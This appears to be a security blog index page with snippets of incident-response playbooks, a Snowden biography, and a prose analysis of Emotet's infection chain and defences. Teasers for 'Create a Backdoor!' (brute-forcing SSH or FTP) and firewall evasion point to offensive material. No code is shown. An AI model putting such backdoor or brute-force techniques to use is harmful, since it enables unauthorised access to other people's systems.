RansomWare PlayBook

Physical Host Containment Disconnect devices identified with malware from the network. You may need to ask the contact to pull out the network cable, disconnect the WiFi radio. If it cannot be determined if the...

Phishing PlayBook

To determine if unsuccessful, check if any credentials have been provided (Email Logs, User Interview) or if any URL’s were accessed (Firewall logs, Web Gateway logs, User Interview). Containment Ensure phishing emails are no longer...

DDOS PlayBook

If you’re getting too much unwanted traffic from certain IP’s, a handy tool is the IP blocking feature of .htaccess file (click here for a tutorial on seeing which IP’s hit your site). This file...

Evading Firewall and Comprimising Windows Machine

DarkTrace Enterprise Immune System

Darktrace's Enterprise Immune System uses proprietary machine learning and AI algorithms to build a so-called "pattern of life" for every network, device, and user within...
Read More "DarkTrace Enterprise Immune System"

Snowden

Edward Joseph Snowden (born June 21, 1983) is an American whistleblower who copied and leaked highly classified information from the National Security Agency (NSA) in 2013 when he was a Central Intelligence Agency (CIA) employee and subcontractor. His disclosures revealed numerous global surveillance programs, many run by the NSA and the Five Eyes Intelligence Alliance with the cooperation of telecommunication companies and European governments, and prompted a cultural discussion about national security and individual privacy.

In 2013, Snowden was hired by an NSA contractor, Booz Allen Hamilton, after previous employment with Dell and the CIA. Snowden says he gradually became disillusioned with the programs with which he was involved and that he tried to raise his ethical concerns through internal channels but was ignored. On May 20, 2013, Snowden flew to Hong Kong after leaving his job at an NSA facility in Hawaii, and in early June he revealed thousands of classified NSA documents to journalists Glenn Greenwald, Laura Poitras, and Ewen MacAskill. Snowden came to international attention after stories based on the material appeared in The Guardian and The Washington Post. Further disclosures were made by other publications including Der Spiegel and The New York Times.

On Snowden’s 30th birthday, June 21, 2013, the U.S. Department of Justice unsealed charges against Snowden of two counts of violating the Espionage Act of 1917 and theft of government property, following which the Department of State revoked his passport. Two days later, he flew into Moscow’s Sheremetyevo Airport, where Russian authorities noted that his U.S. passport had been cancelled, and he was restricted to the airport terminal for over one month. Russia later granted Snowden the right of asylum with an initial visa for residence for one year, and repeated extensions have permitted him to stay at least until 2020. In early 2016, he became the president of the Freedom of the Press Foundation, a San Francisco-based organization that states its purpose is to protect journalists from hacking and government surveillance.As of 2017 he is married and living in Moscow.

On September 17, 2019, his memoir Permanent Record was published. On the first day of publication, the U.S. Department of Justice filed a civil lawsuit against Snowden over publication of his memoir, alleging he had breached nondisclosure agreements signed with the U.S. federal government. Former The Guardian national security reporter Ewen MacAskill called the civil lawsuit a “huge mistake”, noting that the “UK ban of Spycatcher 30 years ago created huge demand”.The memoir was listed as no. 1 on Amazon’s bestseller list that same day.In an interview with Amy Goodman on Democracy Now! On 26 September 2019, Snowden clarified he considers himself a “whistleblower” as opposed to a “leaker” as he considers “a leaker only distributes information for personal gain”.

DarkTrace Enterprise Immune System

Darktrace's Enterprise Immune System uses proprietary machine learning and AI algorithms to...
Read More "DarkTrace Enterprise Immune System"

DarkWeb

What is the dark web? The internet has three main parts to...
Read More "DarkWeb"

DDOS PlayBook

If you’re getting too much unwanted traffic from certain IP’s, a handy...
Read More "DDOS PlayBook"

Create a Backdoor!

You will need to bruteforce SSH or FTP. Preferably SSH for high...
Read More "Create a Backdoor!"

WP Scan Tutorial!

Emotet Malware Analysis

A video recorded in the ANY.RUN malware hunting service displays the execution process of Emotet, allowing to examine the behavior of this malware in a lot of detail.

emotet execution process tree

Figure 1: Displays the processes list generated by the ANY.RUN malware hunting service

text report of the Emotet analysis

Figure 2: Even more information about the execution of Emotet can be found in customizable text reports generated by ANY.RUN

Emotet execution process

Considering that the primary way in which the Emotet trojan is distributed is malicious email spam campaigns, the first step in the chain of infection involves tricking the potential victim into opening an attached Microsoft Office file using social engineering. After the file has been opened and macros enabled, there is no need for additional user actions. Downloaded files contain malicious VBA code which runs after a document has been opened. One of the possible options of the infection process is when the VBA code utilizes WMI to launch a Powershell script which downloads the payload – a malicious executable file from the webserver. Notably, the Powershell script is encoded. Emotet makes steps to maintain a presence in the infected system – it copies itself into %AppData% subfolders and changes the autorun value in the registry. Through all infection process, the malware sends information to and from a server. As the last execution step, Emotet waits for commands from C2 servers.

Prevention of Emotet attacks

To minimize the risk of Emotet virus infection and potential destruction if such infection does occur, users are advised to follow a set of standard best practices, such as not downloading files from suspicious emails and keeping an updated version of antivirus on the machine at all times.

For organizations, it is advised to restrict inbound SMB communication between client systems in order to prevent Emotet from spreading from one machine to another within the local network, provide security training for personnel and instruct employees about the danger of mail spam as well as take all possible precautions to filter out potentially malicious emails at firewall.

How does Emotet spread?

The main distribution method of Emotet malware is malicious email campaigns. The trojan uses it’s address book stealer module to pull the contacts from the email account of its victim and send itself to found contacts from the hijacked account.

Bearing in mind that potential victims are receiving an email from somebody they know and trust, Emotet has a very high chance of a successful attack. The received email usually contains a link to a malicious URL that downloads the malware when clicked. However, email spam is not the only distribution Method that this malware utilizes. It may also take advantage of certain Windows vulnerabilities, thus the malware can make it’s way into a machine completely “silently”, without the user ever knowing about it.

How to collect Emotet’s IOCs using ANY.RUN?

For your detailed Emotet malware analysis ANY.RUN’s “Fake Net” feature will be very useful. It intercepts HTTP requests and returns 404 error, forcing malware to reveal its C2 links.

To turn it on in “Advanced mode” of the “New task” window check the box next to the “Fake net” in the “Network” section.

fake net emotet

Figure 3: Run Emotet sample with turn on “Fake net” feature

Emotet malware is one of the most sophisticated and destructive trojans that are currently active. Since its first introduction all the way back in 2014, the malware has underground a substantial evolution gaining a lot of anti-evasion features, obtaining worm-like functionality and even changing the main focus from information-stealing to installing other trojans onto infected machines. Thanks to the ability to spread to adjacent systems, Emotet can easily infect all machines in a single network, making dealing with the consequences of an attack a true nightmare. The situation is further worsened by the fact that the malware is equipped with a series of anti-evasion tricks that make analyzing it quite difficult. As a result, the process of developing countermeasures is much more complicated in comparison to more simple and straightforward trojans.